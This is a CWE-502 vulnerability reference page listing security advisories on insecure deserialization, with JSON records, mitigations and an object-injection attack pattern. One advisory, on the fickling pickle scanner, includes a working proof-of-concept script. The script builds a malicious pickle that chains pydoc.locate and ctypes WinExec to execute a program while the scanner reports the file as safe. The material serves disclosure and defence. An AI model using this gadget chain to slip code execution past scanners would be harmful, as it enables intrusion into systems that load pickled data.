CWE-502
AllowedDeserialization of Untrusted Data
Abstraction: Base · Status: Draft
The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
4797 vulnerabilities reference this CWE, most recent first.
GHSA-5H2C-X34M-PF7P
Vulnerability from github – Published: 2022-05-13 01:48 – Updated: 2022-05-13 01:48ZoneMinder version <= 1.32.2 contains a Other/Unknown vulnerability in User-controlled parameter that can result in Disclosure of confidential data, denial of service, SSRF, remote code execution.
{
"affected": [],
"aliases": [
"CVE-2018-1000832"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-12-20T15:29:00Z",
"severity": "CRITICAL"
},
"details": "ZoneMinder version \u003c= 1.32.2 contains a Other/Unknown vulnerability in User-controlled parameter that can result in Disclosure of confidential data, denial of service, SSRF, remote code execution.",
"id": "GHSA-5h2c-x34m-pf7p",
"modified": "2022-05-13T01:48:39Z",
"published": "2022-05-13T01:48:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000832"
},
{
"type": "WEB",
"url": "https://github.com/ZoneMinder/zoneminder/issues/2271"
},
{
"type": "WEB",
"url": "https://0dd.zone/2018/10/28/zoneminder-Object-Injection"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-5H2F-VWH5-PC3G
Vulnerability from github – Published: 2024-05-14 15:32 – Updated: 2024-05-14 15:32Due to an unsafe de-serialization method used by the Veeam Service Provider Console(VSPC) server in communication between the management agent and its components, under certain conditions, it is possible to perform Remote Code Execution (RCE) on the VSPC server machine.
{
"affected": [],
"aliases": [
"CVE-2024-29212"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-14T15:15:43Z",
"severity": "CRITICAL"
},
"details": "Due to an unsafe de-serialization method used by the Veeam Service Provider Console(VSPC) server in communication between the management agent and its components, under certain conditions, it is possible to perform Remote Code Execution (RCE) on the VSPC server machine.",
"id": "GHSA-5h2f-vwh5-pc3g",
"modified": "2024-05-14T15:32:54Z",
"published": "2024-05-14T15:32:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29212"
},
{
"type": "WEB",
"url": "https://www.veeam.com/kb4575"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-5H5C-69MG-QP94
Vulnerability from github – Published: 2026-07-01 18:31 – Updated: 2026-07-01 18:31NVIDIA Megatron Bridge for Linux contains a vulnerability where an attacker could cause improper control of dynamically managed code resources. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, and information disclosure.
{
"affected": [],
"aliases": [
"CVE-2026-24251"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-01T16:16:45Z",
"severity": "HIGH"
},
"details": "NVIDIA Megatron Bridge for Linux contains a vulnerability where an attacker could cause improper control of dynamically managed code resources. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, and information disclosure.",
"id": "GHSA-5h5c-69mg-qp94",
"modified": "2026-07-01T18:31:48Z",
"published": "2026-07-01T18:31:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24251"
},
{
"type": "WEB",
"url": "https://github.com/NVIDIA/product-security/tree/main/2026/5841"
},
{
"type": "WEB",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24251"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-5H5V-M596-R6RF
Vulnerability from github – Published: 2024-05-30 18:37 – Updated: 2024-05-30 18:37It has been discovered that request handling in Extbase can be vulnerable to insecure deserialization. User submitted payload has to be signed with a corresponding HMAC-SHA1 using the sensitive TYPO3 encryptionKey as secret - invalid or unsigned payload is not deserialized.
However, since sensitive information could have been leaked by accident (e.g. in repositories or in commonly known and unprotected backup files), there is the possibility that attackers know the private encryptionKey and are able to calculate the required HMAC-SHA1 to allow a malicious payload to be deserialized.
Requirements for successfully exploiting this vulnerability (all of the following):
- rendering at least one Extbase plugin in the frontend
- encryptionKey has been leaked (from LocalConfiguration.php or corresponding .env file)
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-core"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.7.30"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "typo3/cms-core"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.0"
},
{
"fixed": "9.5.12"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2024-05-30T18:37:39Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "It has been discovered that request handling in Extbase can be vulnerable to insecure deserialization. User submitted payload has to be signed with a corresponding HMAC-SHA1 using the sensitive TYPO3 encryptionKey as secret - invalid or unsigned payload is not deserialized.\n\nHowever, since sensitive information could have been leaked by accident (e.g. in repositories or in commonly known and unprotected backup files), there is the possibility that attackers know the private encryptionKey and are able to calculate the required HMAC-SHA1 to allow a malicious payload to be deserialized.\n\nRequirements for successfully exploiting this vulnerability (all of the following):\n\n- rendering at least one Extbase plugin in the frontend\n- encryptionKey has been leaked (from LocalConfiguration.php or corresponding .env file)",
"id": "GHSA-5h5v-m596-r6rf",
"modified": "2024-05-30T18:37:39Z",
"published": "2024-05-30T18:37:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/2019-12-17-7.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/TYPO3-CMS/core"
},
{
"type": "WEB",
"url": "https://typo3.org/security/advisory/typo3-psa-2019-011"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "TYPO3 Possible Insecure Deserialization in Extbase Request Handling"
}
GHSA-5H6J-GR7X-5QPG
Vulnerability from github – Published: 2026-02-19 18:31 – Updated: 2026-02-20 00:31Deserialization of Untrusted Data vulnerability in ThemeGoods Grand Restaurant grandrestaurant allows Object Injection.This issue affects Grand Restaurant: from n/a through <= 7.0.10.
{
"affected": [],
"aliases": [
"CVE-2026-23542"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-19T09:16:12Z",
"severity": "CRITICAL"
},
"details": "Deserialization of Untrusted Data vulnerability in ThemeGoods Grand Restaurant grandrestaurant allows Object Injection.This issue affects Grand Restaurant: from n/a through \u003c= 7.0.10.",
"id": "GHSA-5h6j-gr7x-5qpg",
"modified": "2026-02-20T00:31:52Z",
"published": "2026-02-19T18:31:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23542"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Theme/grandrestaurant/vulnerability/wordpress-grand-restaurant-theme-7-0-10-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-5HFR-J85R-7CQX
Vulnerability from github – Published: 2026-06-17 18:35 – Updated: 2026-06-17 18:35Unauthenticated PHP Object Injection in WP Activity Log <= 5.6.3.1 versions.
{
"affected": [],
"aliases": [
"CVE-2026-54806"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-17T13:20:51Z",
"severity": "CRITICAL"
},
"details": "Unauthenticated PHP Object Injection in WP Activity Log \u003c= 5.6.3.1 versions.",
"id": "GHSA-5hfr-j85r-7cqx",
"modified": "2026-06-17T18:35:52Z",
"published": "2026-06-17T18:35:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54806"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/wp-security-audit-log/vulnerability/wordpress-wp-activity-log-plugin-5-6-3-1-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-5HJG-CHJ2-7WF8
Vulnerability from github – Published: 2024-05-14 18:30 – Updated: 2024-05-14 18:30The Last Viewed Posts by WPBeginner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.0 via deserialization of untrusted input from the LastViewedPosts Cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
{
"affected": [],
"aliases": [
"CVE-2024-3070"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-14T15:39:52Z",
"severity": "CRITICAL"
},
"details": "The Last Viewed Posts by WPBeginner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.0 via deserialization of untrusted input from the LastViewedPosts Cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.",
"id": "GHSA-5hjg-chj2-7wf8",
"modified": "2024-05-14T18:30:52Z",
"published": "2024-05-14T18:30:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3070"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=\u0026sfph_mail=\u0026reponame=\u0026old=3062246%40last-viewed-posts\u0026new=3062246%40last-viewed-posts\u0026sfp_email=\u0026sfph_mail="
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b6c5cc05-b147-46f6-aaa9-4c82aae1b544?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-5HMF-8WX5-4QQ3
Vulnerability from github – Published: 2025-09-15 18:31 – Updated: 2025-11-05 20:44A vulnerability in Apache Fory allows a remote attacker to cause a Denial of Service (DoS). The issue stems from the insecure deserialization of untrusted data. An attacker can supply a large, specially crafted data payload that, when processed, consumes an excessive amount of CPU resources during the deserialization process. This leads to CPU exhaustion, rendering the application or system using the Apache Fory library unresponsive and unavailable to legitimate users.
Users of Apache Fory are strongly advised to upgrade to version 0.12.2 or later to mitigate this vulnerability. Developers of libraries and applications that depend on Apache Fory should update their dependency requirements to Apache Fory 0.12.2 or later and release new versions of their software.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.fory:fory-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.12.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-59328"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-15T23:31:43Z",
"nvd_published_at": "2025-09-15T17:15:36Z",
"severity": "MODERATE"
},
"details": "A vulnerability in Apache Fory allows a remote attacker to cause a Denial of Service (DoS). The issue stems from the insecure deserialization of untrusted data. An attacker can supply a large, specially crafted data payload\u00a0that, when processed, consumes an excessive amount of CPU resources during the deserialization process. This leads to CPU exhaustion, rendering the application or system using the Apache Fory library unresponsive and unavailable to legitimate users.\n\nUsers of Apache Fory are strongly advised to upgrade to version 0.12.2 or later\u00a0to mitigate this vulnerability. Developers of libraries and applications that depend on Apache Fory should update their dependency requirements to Apache Fory 0.12.2 or later\u00a0and release new versions of their software.",
"id": "GHSA-5hmf-8wx5-4qq3",
"modified": "2025-11-05T20:44:32Z",
"published": "2025-09-15T18:31:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59328"
},
{
"type": "WEB",
"url": "https://github.com/apache/fory/pull/2578"
},
{
"type": "WEB",
"url": "https://github.com/apache/fory/commit/c3b4d3fe389e38495aeb8301d75da1ab658f0c6e"
},
{
"type": "WEB",
"url": "https://fory.apache.org/security"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/fory"
},
{
"type": "WEB",
"url": "https://github.com/apache/fory/releases/tag/v0.12.2"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/09/15/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Apache Fory Deserialization of Untrusted Data vulnerability"
}
GHSA-5HQ5-9PJ6-4C2R
Vulnerability from github – Published: 2023-04-19 00:30 – Updated: 2024-04-04 03:34A deserialization vulnerability in the destruct() function of Laravel v8.5.9 allows attackers to execute arbitrary commands.
{
"affected": [],
"aliases": [
"CVE-2021-28254"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-04-19T00:15:07Z",
"severity": "CRITICAL"
},
"details": "A deserialization vulnerability in the destruct() function of Laravel v8.5.9 allows attackers to execute arbitrary commands.",
"id": "GHSA-5hq5-9pj6-4c2r",
"modified": "2024-04-04T03:34:49Z",
"published": "2023-04-19T00:30:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28254"
},
{
"type": "WEB",
"url": "https://s1mple-top.github.io/2021/03/09/Laravel8-new-pop-chain-mining-process"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-5HVC-6WX8-MVV4
Vulnerability from github – Published: 2026-01-09 21:05 – Updated: 2026-01-11 14:55Fickling's assessment
pydoc and ctypes were added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1).
Original report
Summary
Both ctypes and pydoc modules arent explictly blocked. Even other existing pickle scanning tools (like picklescan) do not block pydoc.locate. Chaining these two together can achieve RCE while the scanner still reports the file as LIKELY_SAFE
Details
Import: GLOBAL pydoc locate (Allowed). Resolution: Call locate('ctypes.windll.kernel32.WinExec'). Execution: Call the result with (b'calc.exe', 1).
To bypass the unused variable check an exception object is used, on the assumption that Exception would not be blocked in the future as it is a benign builtin
PoC
import os
GLOBAL = b'c'
STRING = b'S'
BININT = b'K'
TUPLE1 = b'\x85'
TUPLE2 = b'\x86'
EMPTY_TUPLE = b')'
REDUCE = b'R'
PUT = b'p'
GET = b'g'
POP = b'0'
EMPTY_DICT = b'}'
SETITEM = b's'
BUILD = b'b'
STOP = b'.'
def generate_stealth_payload():
payload = b""
payload += GLOBAL + b"pydoc\nlocate\n"
payload += STRING + b"'ctypes.windll.kernel32.WinExec'\n"
payload += TUPLE1 + REDUCE
payload += PUT + b"0\n" # Var 0 = <_FuncPtr WinExec>
payload += POP
payload += GET + b"0\n"
payload += b"C" + b"\x08" + b"calc.exe"
payload += BININT + b"\x01"
payload += TUPLE2 + REDUCE
payload += PUT + b"1\n" # Var 1 = Execution Result
payload += POP
payload += GLOBAL + b"builtins\nException\n"
payload += EMPTY_TUPLE + REDUCE
payload += PUT + b"2\n" # Var 2 = Exception instance
payload += EMPTY_DICT
payload += STRING + b"'rce_status'\n"
payload += GET + b"1\n"
payload += SETITEM # { 'rce_status': result }
payload += BUILD
payload += STOP
return payload
data = generate_stealth_payload()
with open("stealth_ctypes.pkl", "wb") as f:
f.write(data)
print("Generated 'stealth_ctypes.pkl'")
````
What fickling sees
```python
from pydoc import locate
_var0 = locate('ctypes.windll.kernel32.WinExec')
_var1 = _var0(b'calc.exe', 1)
_var2 = Exception()
_var3 = _var2
_var3.__setstate__({'rce_status': _var1})
result0 = _var3
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.1.6"
},
"package": {
"ecosystem": "PyPI",
"name": "fickling"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-22608"
],
"database_specific": {
"cwe_ids": [
"CWE-184",
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-09T21:05:13Z",
"nvd_published_at": "2026-01-10T02:15:49Z",
"severity": "HIGH"
},
"details": "# Fickling\u0027s assessment\n\n`pydoc` and `ctypes` were added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1).\n\n# Original report\n\n### Summary\nBoth ctypes and pydoc modules arent explictly blocked. Even other existing pickle scanning tools (like picklescan) do not block pydoc.locate. Chaining these two together can achieve RCE while the scanner still reports the file as LIKELY_SAFE\n\n### Details\nImport: GLOBAL pydoc locate (Allowed).\nResolution: Call locate(\u0027ctypes.windll.kernel32.WinExec\u0027).\nExecution: Call the result with (b\u0027calc.exe\u0027, 1).\n\nTo bypass the unused variable check an exception object is used, on the assumption that Exception would not be blocked in the future as it is a benign builtin\n\n### PoC\n```python\nimport os\n\nGLOBAL = b\u0027c\u0027\nSTRING = b\u0027S\u0027\nBININT = b\u0027K\u0027\nTUPLE1 = b\u0027\\x85\u0027\nTUPLE2 = b\u0027\\x86\u0027\nEMPTY_TUPLE = b\u0027)\u0027\nREDUCE = b\u0027R\u0027\nPUT = b\u0027p\u0027\nGET = b\u0027g\u0027\nPOP = b\u00270\u0027\nEMPTY_DICT = b\u0027}\u0027\nSETITEM = b\u0027s\u0027\nBUILD = b\u0027b\u0027\nSTOP = b\u0027.\u0027\n\ndef generate_stealth_payload():\n payload = b\"\"\n\n payload += GLOBAL + b\"pydoc\\nlocate\\n\"\n payload += STRING + b\"\u0027ctypes.windll.kernel32.WinExec\u0027\\n\"\n payload += TUPLE1 + REDUCE\n payload += PUT + b\"0\\n\" # Var 0 = \u003c_FuncPtr WinExec\u003e\n payload += POP\n\n payload += GET + b\"0\\n\" \n payload += b\"C\" + b\"\\x08\" + b\"calc.exe\" \n payload += BININT + b\"\\x01\" \n payload += TUPLE2 + REDUCE\n payload += PUT + b\"1\\n\" # Var 1 = Execution Result\n payload += POP\n\n payload += GLOBAL + b\"builtins\\nException\\n\"\n payload += EMPTY_TUPLE + REDUCE\n payload += PUT + b\"2\\n\" # Var 2 = Exception instance\n\n payload += EMPTY_DICT\n payload += STRING + b\"\u0027rce_status\u0027\\n\"\n payload += GET + b\"1\\n\"\n payload += SETITEM # { \u0027rce_status\u0027: result }\n \n payload += BUILD \n \n payload += STOP\n return payload\n\ndata = generate_stealth_payload()\nwith open(\"stealth_ctypes.pkl\", \"wb\") as f:\n f.write(data)\n \nprint(\"Generated \u0027stealth_ctypes.pkl\u0027\")\n````\n\nWhat fickling sees\n```python\nfrom pydoc import locate\n_var0 = locate(\u0027ctypes.windll.kernel32.WinExec\u0027)\n_var1 = _var0(b\u0027calc.exe\u0027, 1)\n_var2 = Exception()\n_var3 = _var2\n_var3.__setstate__({\u0027rce_status\u0027: _var1})\nresult0 = _var3\n```\n\u003cimg width=\"915\" height=\"197\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b5d81e0d-4946-4768-a704-618a4554ae7a\" /\u003e",
"id": "GHSA-5hvc-6wx8-mvv4",
"modified": "2026-01-11T14:55:08Z",
"published": "2026-01-09T21:05:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-5hvc-6wx8-mvv4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22608"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/pull/195"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/commit/d0b00d584afb5c58e38991cd544cb3889de90db6"
},
{
"type": "PACKAGE",
"url": "https://github.com/trailofbits/fickling"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/blob/977b0769c13537cd96549c12bb537f05464cf09c/test/test_bypasses.py#L145"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Fickling vulnerable to use of ctypes and pydoc gadget chain to bypass detection"
}
Mitigation
If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
Mitigation
When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.
Mitigation
Explicitly define a final object() to prevent deserialization.
Mitigation
- Make fields transient to protect them from deserialization.
- An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
Avoid having unnecessary types or gadgets (a sequence of instances and method invocations that can self-execute during the deserialization process, often found in libraries) available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation.
Mitigation
Employ cryptography of the data or code for protection. However, it's important to note that it would still be client-side security. This is risky because if the client is compromised then the security implemented on the client (the cryptography) can be bypassed.
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-586: Object Injection
An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.